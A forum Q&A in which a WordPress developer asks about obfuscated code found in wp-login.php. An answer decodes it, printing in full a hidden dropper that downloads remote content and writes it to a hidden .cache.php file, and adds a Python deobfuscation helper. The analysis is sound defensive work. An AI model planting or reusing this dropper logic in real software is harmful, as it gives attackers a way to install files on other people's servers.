Encoded code inside wp-login.php (WordPress)
Recently, during development of a website using WordPress, I found this code inside wp-login.php:
if(isset($_GET["\x6co\x61\x64b\x65a\x6e"])){$wrdmt=array("nxlwxqpd"=>"\x62a\x73e6\x34_\x64\x65\x63\x6f\x64\x65","srohzll"=>"\x6d\x64\x35","ffqahag"=>"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","nqavwlhn"=>"cr\x65\x61t\x65\x5f\x66un\x63ti\x6f\x6e");$uynkew="\x65\x78\x74\x72\x61\x63\x74";$uynkew($wrdmt);$cmioamog=$nqavwlhn('',$nxlwxqpd($ffqahag));$cmioamog();}
This code is not creating a problem, in the sense that I don't know how the code was inserted into the file. One more file, .cache.php, was found at wp-content/themes/.cache.php; inside that file the same code is present, but larger, and there is copyright text there. Can anyone tell me? Thanks in advance.
That's a base64-encoded string with strong obfuscation around it. It might be an indication that the website has been hacked. Anyway, let's get started decoding.
You can start by decoding the strings inside the code (they're hex-encoded ASCII chars). Use an online tool such as https://www.unphp.net/ for that. You'd get:
<?
if(isset($_GET["loadbean"])){
    $wrdmt=array(
        "nxlwxqpd"=>"base64_decode",
        "srohzll"=>"md5",
        "ffqahag"=>"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",
        "nqavwlhn"=>"create_function"
    );
    $uynkew = "extract";
    $uynkew($wrdmt);
    $cmioamog = $nqavwlhn('',$nxlwxqpd($ffqahag));
    $cmioamog();
}
?>
So the code base64-decodes some string, creates a function out of it, and calls it. You can rename the variables and see exactly what it does. The base64-encoded code decodes in turn to:
<?
$a = 'ommp3yrvvbv0b0b17lyrqbmx2';
$b = $_GET['loadbean'];
$a = str_replace(array($b[2], $b[4], $b[1], $b[9], $b[10], $b[7], $b[12], $b[13], $b[14], $b[0], $b[3]),
                 array('8', '.', ':', 't', '/', '/', 'h', 'd', 't', '/', 'n'), $a);
if (filter_var($a, FILTER_VALIDATE_URL) === false) {
    echo 'invalid';
    exit;
}
$c = 'hpuhfyvqdgk';
$d = file_get_contents($a);
if (!stristr($d, $c)) {
    $e = curl_init($a);
    curl_setopt($e, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($e, CURLOPT_BINARYTRANSFER, 1);
    curl_setopt($e, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($e, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36');
    $d = curl_exec($e);
    if (curl_errno($e)) {
        echo 'error: curl error';
        exit;
    }
    curl_close($e);
    if (!stristr($d, $c)) {
        echo 'could not dl file: ' . $a;
        exit;
    }
}
$f = (strpos(__FILE__, '(') !== false ? dirname(substr(__FILE__, 0, strpos(__FILE__, '('))) : dirname(__FILE__)) . DIRECTORY_SEPARATOR . '.cache.php';
if (!file_put_contents($f, $d)) {
    echo 'could not create file: ' . $f;
} else {
    echo 'bean: http://' . $_SERVER['HTTP_HOST'] . str_replace($_SERVER['DOCUMENT_ROOT'], '', $f);
}
exit;
?>
This should get you started on reversing the code (e.g. use PhpStorm or another PHP IDE to start refactoring / renaming variables, execute parts of the code to see how things decode, etc.). Looking at it, I see file_put_contents() and file_get_contents(), so it might be a shell to download and upload files to the server.
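As an added example (not code from the question or the answer), a small Python helper that performs the first decoding step mechanically: it resolves the \xHH escapes in the double-quoted PHP literals, flags function names that appear only as strings (the sign they are being called indirectly through extract()/create_function()), and base64-decodes the payload constant. The base64 blob is redacted on the page, so the sample embeds a constructed harmless payload in its place.

```python
import base64
import re

# Constructed sample modelled on the wp-login.php one-liner from the question;
# the real base64 payload is redacted on the page, so a harmless one stands in.
FAKE_PAYLOAD = base64.b64encode(b"echo 'stage two';").decode()
SAMPLE = ('if(isset($_GET["\\x6co\\x61\\x64b\\x65a\\x6e"])){$wrdmt=array('
          '"nxlwxqpd"=>"\\x62a\\x73e6\\x34_\\x64\\x65\\x63\\x6f\\x64\\x65",'
          '"srohzll"=>"\\x6d\\x64\\x35","ffqahag"=>"' + FAKE_PAYLOAD + '",'
          '"nqavwlhn"=>"cr\\x65\\x61t\\x65\\x5f\\x66un\\x63ti\\x6f\\x6e");'
          '$uynkew="\\x65\\x78\\x74\\x72\\x61\\x63\\x74";$uynkew($wrdmt);'
          '$cmioamog=$nqavwlhn(\'\',$nxlwxqpd($ffqahag));$cmioamog();}')

# Escapes PHP resolves inside double-quoted strings: \xHH (hex) and \NNN (octal).
_ESC = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})')
# One complete double-quoted PHP literal, escapes included.
_DQ = re.compile(r'"((?:[^"\\]|\\.)*)"')
# Functions that show up as string literals only when called indirectly.
DANGEROUS = {"base64_decode", "create_function", "extract", "eval", "assert",
             "gzinflate", "str_rot13", "system", "shell_exec", "passthru"}

def php_unescape(body: str) -> str:
    """Resolve \\xHH and \\NNN escapes in the body of a double-quoted string."""
    return _ESC.sub(lambda m: chr(int(m.group(1), 16)) if m.group(1)
                    else chr(int(m.group(2), 8)), body)

def deobfuscate(code: str) -> str:
    """Rewrite every double-quoted literal in `code` with its escapes resolved."""
    return _DQ.sub(lambda m: '"' + php_unescape(m.group(1)) + '"', code)

def analyse(code: str) -> dict:
    """Return the readable code, the dangerous function names hidden in string
    literals, and the decoded text of the first base64-looking literal."""
    literals = [php_unescape(m.group(1)) for m in _DQ.finditer(code)]
    payload = None
    for lit in literals:
        # Function names contain '_' and array keys are short; only the blob fits.
        if len(lit) >= 16 and re.fullmatch(r'[A-Za-z0-9+/]+={0,2}', lit):
            try:
                payload = base64.b64decode(lit, validate=True).decode('utf-8', 'replace')
                break
            except ValueError:  # not valid base64 after all, keep looking
                continue
    return {"plain": deobfuscate(code),
            "hidden_functions": sorted(set(literals) & DANGEROUS),
            "payload": payload}

if __name__ == "__main__":
    result = analyse(SAMPLE)
    print(result["plain"], result["hidden_functions"], result["payload"], sep="\n")
```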